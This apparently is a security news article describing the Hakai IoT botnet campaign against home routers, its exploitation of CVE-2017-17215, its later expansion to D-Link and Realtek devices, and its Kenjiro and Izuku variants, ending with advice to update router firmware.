The Hakai IoT botnet is a dangerous threat that is being distributed in a global attack campaign targeting home routers of all popular brands. It is built on the foundations of an older threat featuring heavy upgrades.
Hakai Iot Botnet Attacks Routers
The Hakai IoT botnet is a recent malicious payload that has been identified in a global attack campaign. It attempted to intrude onto user networks by targeting home routers via vulnerability testing. The criminals behind it insert scripts that automatically probe for target devices and look out for the issue. The attacks began by probing Huawei Hg352 routers with the CVE-2017-17215 exploit. It takes advantage of a remote code execution vulnerability allowing hackers to execute commands of their own choosing. Affected systems will react if malicious packets are sent over port 37215. To counter any possible abuse the owners of these devices should update their firmware to the latest available version.
In August the security researchers tracking the Hakai IoT found out that the Hakai IoT botnet was upgraded to act against a wider range of devices — D-Link Routers using the HNAP protocol, generic IoT devices and Realtek routers. This change shows that the criminals behind it keep the threat constantly updated, it is possible that a larger collective is behind its development.
There are several main characteristics that are unique to Hakai:
- Port Scanner — The Hakai botnet can scan the open ports of target devices, automated entry attempts are made using the most commonly used services.
- Custom Versions Creation — Two offspring versions coming from Hakai have been identified — they are called Kenjiro and Izuku. They feature slight code variations.
- Active Development
It is possible that the custom strains and the ongoing updates are carried out by different hacking groups. IoT botnets like Hakai are often sold on the underground hacker markets for a profit. The buyers can purchase custom versions and make changes to the original code by themselves.
We anticipate that updates will be issued soon with new features. All IoT devices should be updated to the latest firmware versions to protect them from the automated penetration testing.